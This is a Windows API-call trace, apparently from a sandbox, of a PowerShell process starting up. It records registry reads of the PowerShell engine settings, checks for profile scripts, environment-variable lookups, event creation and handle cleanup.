	[0336.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.968] VirtualQuery (in: lpAddress=0x1cbc40, lpBuffer=0x1ccb00, dwLength=0x30 | out: lpBuffer=0x1ccb00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.968] VirtualQuery (in: lpAddress=0x1cb490, lpBuffer=0x1cc350, dwLength=0x30 | out: lpBuffer=0x1cc350*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.968] VirtualQuery (in: lpAddress=0x1cb490, lpBuffer=0x1cc350, dwLength=0x30 | out: lpBuffer=0x1cc350*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.969] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda98 | out: phkResult=0x1cda98*=0x350) returned 0x0
	[0336.969] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cda1c, lpData=0x0, lpcbData=0x1cda18*=0x0 | out: lpType=0x1cda1c*=0x1, lpData=0x0, lpcbData=0x1cda18*=0x56) returned 0x0
	[0336.969] CoTaskMemAlloc (cb=0x5a) returned 0x1b4135d0
	[0336.969] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd9ec, lpData=0x1b4135d0, lpcbData=0x1cd9e8*=0x56 | out: lpType=0x1cd9ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd9e8*=0x56) returned 0x0
	[0336.969] CoTaskMemFree (pv=0x1b4135d0) 
	[0336.969] RegCloseKey (hKey=0x350) returned 0x0
	[0336.969] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda98 | out: phkResult=0x1cda98*=0x350) returned 0x0
	[0336.969] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cda1c, lpData=0x0, lpcbData=0x1cda18*=0x0 | out: lpType=0x1cda1c*=0x1, lpData=0x0, lpcbData=0x1cda18*=0x56) returned 0x0
	[0336.969] CoTaskMemAlloc (cb=0x5a) returned 0x1b4135d0
	[0336.969] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd9ec, lpData=0x1b4135d0, lpcbData=0x1cd9e8*=0x56 | out: lpType=0x1cd9ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd9e8*=0x56) returned 0x0
	[0336.970] CoTaskMemFree (pv=0x1b4135d0) 
	[0336.970] RegCloseKey (hKey=0x350) returned 0x0
	[0336.970] CoTaskMemAlloc (cb=0x20c) returned 0x1b3fd820
	[0336.970] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3fd820 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0336.970] CoTaskMemFree (pv=0x1b3fd820) 
	[0336.970] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0336.970] CoTaskMemAlloc (cb=0x20c) returned 0x1b3fd820
	[0336.970] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3fd820 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0336.970] CoTaskMemFree (pv=0x1b3fd820) 
	[0336.970] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0336.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0336.971] SetErrorMode (uMode=0x1) returned 0x1
	[0336.971] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cda00 | out: lpFileInformation=0x1cda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0336.971] SetErrorMode (uMode=0x1) returned 0x1
	[0336.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0336.971] SetErrorMode (uMode=0x1) returned 0x1
	[0336.971] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cda00 | out: lpFileInformation=0x1cda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0336.972] SetErrorMode (uMode=0x1) returned 0x1
	[0336.972] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0336.972] SetErrorMode (uMode=0x1) returned 0x1
	[0336.972] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cda00 | out: lpFileInformation=0x1cda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0336.972] SetErrorMode (uMode=0x1) returned 0x1
	[0336.972] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0336.972] SetErrorMode (uMode=0x1) returned 0x1
	[0336.972] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cda00 | out: lpFileInformation=0x1cda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0336.972] SetErrorMode (uMode=0x1) returned 0x1
	[0336.973] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.973] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.973] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.973] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.974] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.974] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.975] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.975] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.976] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.976] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.976] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350
	[0336.976] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1a8
	[0336.976] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0336.976] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c
	[0336.976] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380
	[0336.977] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0336.977] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0336.977] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384
	[0336.977] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x30c
	[0336.977] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378
	[0336.977] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0336.977] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0336.978] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.978] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.979] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0337.354] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.355] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.356] SetEvent (hEvent=0x37c) returned 1
	[0337.356] SetEvent (hEvent=0x350) returned 1
	[0337.356] SetEvent (hEvent=0x1a8) returned 1
	[0337.356] SetEvent (hEvent=0x374) returned 1
	[0337.357] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0337.358] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.358] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.359] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd938 | out: phkResult=0x1cd938*=0x340) returned 0x0
	[0337.359] RegQueryValueExW (in: hKey=0x340, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cd8bc, lpData=0x0, lpcbData=0x1cd8b8*=0x0 | out: lpType=0x1cd8bc*=0x0, lpData=0x0, lpcbData=0x1cd8b8*=0x0) returned 0x2

Thread:
	id = 117
	os_tid = 0x15c


Thread:
	id = 120
	os_tid = 0x11c


Thread:
	id = 137
	os_tid = 0x62c


Thread:
	id = 151
	os_tid = 0x390


Thread:
	id = 152
	os_tid = 0x950

	[0269.503] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0317.277] LocalFree (hMem=0x327290) returned 0x0
	[0317.277] CloseHandle (hObject=0x1a8) returned 1
	[0317.277] CloseHandle (hObject=0x13) returned 1
	[0317.278] CloseHandle (hObject=0xf) returned 1
	[0317.279] RegCloseKey (hKey=0x30c) returned 0x0
	[0317.279] RegCloseKey (hKey=0x308) returned 0x0
	[0317.279] RegCloseKey (hKey=0x304) returned 0x0
	[0317.279] LocalFree (hMem=0x327260) returned 0x0
	[0317.280] RegCloseKey (hKey=0x32c) returned 0x0
	[0319.687] RegCloseKey (hKey=0x32c) returned 0x0
	[0324.000] RegCloseKey (hKey=0x38c) returned 0x0
	[0324.001] RegCloseKey (hKey=0x370) returned 0x0
	[0324.001] RegCloseKey (hKey=0x36c) returned 0x0
	[0324.001] RegCloseKey (hKey=0x368) returned 0x0
	[0324.001] RegCloseKey (hKey=0x364) returned 0x0
	[0324.001] RegCloseKey (hKey=0x360) returned 0x0
	[0324.002] RegCloseKey (hKey=0x35c) returned 0x0
	[0324.002] RegCloseKey (hKey=0x358) returned 0x0
	[0324.002] RegCloseKey (hKey=0x354) returned 0x0
	[0324.002] RegCloseKey (hKey=0x388) returned 0x0
	[0324.003] RegCloseKey (hKey=0x344) returned 0x0
	[0324.003] RegCloseKey (hKey=0x340) returned 0x0
	[0324.003] RegCloseKey (hKey=0x33c) returned 0x0
	[0324.003] RegCloseKey (hKey=0x338) returned 0x0
	[0324.004] RegCloseKey (hKey=0x334) returned 0x0
	[0324.004] RegCloseKey (hKey=0x330) returned 0x0
	[0324.004] RegCloseKey (hKey=0x1a8) returned 0x0
	[0324.005] RegCloseKey (hKey=0x30c) returned 0x0
	[0324.005] RegCloseKey (hKey=0x384) returned 0x0
	[0324.005] RegCloseKey (hKey=0x304) returned 0x0
	[0324.005] RegCloseKey (hKey=0x32c) returned 0x0
	[0324.005] RegCloseKey (hKey=0x380) returned 0x0
	[0324.006] RegCloseKey (hKey=0x37c) returned 0x0
	[0324.006] RegCloseKey (hKey=0x378) returned 0x0
	[0324.006] RegCloseKey (hKey=0x350) returned 0x0
	[0334.495] RegCloseKey (hKey=0x30c) returned 0x0
	[0334.495] RegCloseKey (hKey=0x384) returned 0x0
	[0334.495] RegCloseKey (hKey=0x304) returned 0x0
	[0334.496] RegCloseKey (hKey=0x32c) returned 0x0
	[0334.496] RegCloseKey (hKey=0x380) returned 0x0
	[0334.496] RegCloseKey (hKey=0x37c) returned 0x0
	[0334.496] RegCloseKey (hKey=0x374) returned 0x0
	[0334.497] RegCloseKey (hKey=0x1a8) returned 0x0
	[0334.497] RegCloseKey (hKey=0x350) returned 0x0
	[0641.656] RegCloseKey (hKey=0x340) returned 0x0

Thread:
	id = 226
	os_tid = 0xc8c


Thread:
	id = 339
	os_tid = 0xc88

	[0337.736] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0337.740] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0337.744] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.745] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.746] VirtualQuery (in: lpAddress=0x1c73d9a0, lpBuffer=0x1c73e860, dwLength=0x30 | out: lpBuffer=0x1c73e860*(BaseAddress=0x1c73d000, AllocationBase=0x1bdb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.749] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.749] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.752] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.752] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.755] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.755] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.764] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.765] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.767] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.767] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.768] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.768] CoTaskMemFree (pv=0x3d2bc0) 
	[0337.773] VirtualQuery (in: lpAddress=0x1c73dc50, lpBuffer=0x1c73eb10, dwLength=0x30 | out: lpBuffer=0x1c73eb10*(BaseAddress=0x1c73d000, AllocationBase=0x1bdb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.774] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0337.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.774] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.232] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.232] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.232] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.232] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.233] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.233] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.238] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.238] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.711] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.711] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.714] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.714] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.715] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.715] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.717] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.718] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.719] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.719] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.720] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.720] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.722] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.722] CoTaskMemFree (pv=0x3d2bc0) 
	[0338.740] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0338.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.740] CoTaskMemFree (pv=0x3d2bc0) 
	[0339.483] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0339.483] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0339.483] CoTaskMemFree (pv=0x3d2bc0) 
	[0339.486] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0339.486] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0339.487] CoTaskMemFree (pv=0x3d2bc0) 
	[0339.487] CoTaskMemAlloc (cb=0x128) returned 0x378490
	[0339.487] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x378490, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0339.487] CoTaskMemFree (pv=0x378490) 
	[0339.492] CoTaskMemAlloc (cb=0x20e) returned 0x1b3ff490
	[0339.492] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b3ff490 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0339.492] CoTaskMemFree (pv=0x1b3ff490) 
	[0339.497] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0339.498] SetErrorMode (uMode=0x1) returned 0x1
	[0339.501] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0339.890] SetErrorMode (uMode=0x1) returned 0x1
	[0339.892] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0339.892] SetErrorMode (uMode=0x1) returned 0x1
	[0339.892] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0339.932] SetErrorMode (uMode=0x1) returned 0x1
	[0339.934] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0339.934] SetErrorMode (uMode=0x1) returned 0x1
	[0339.934] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0339.943] SetErrorMode (uMode=0x1) returned 0x1
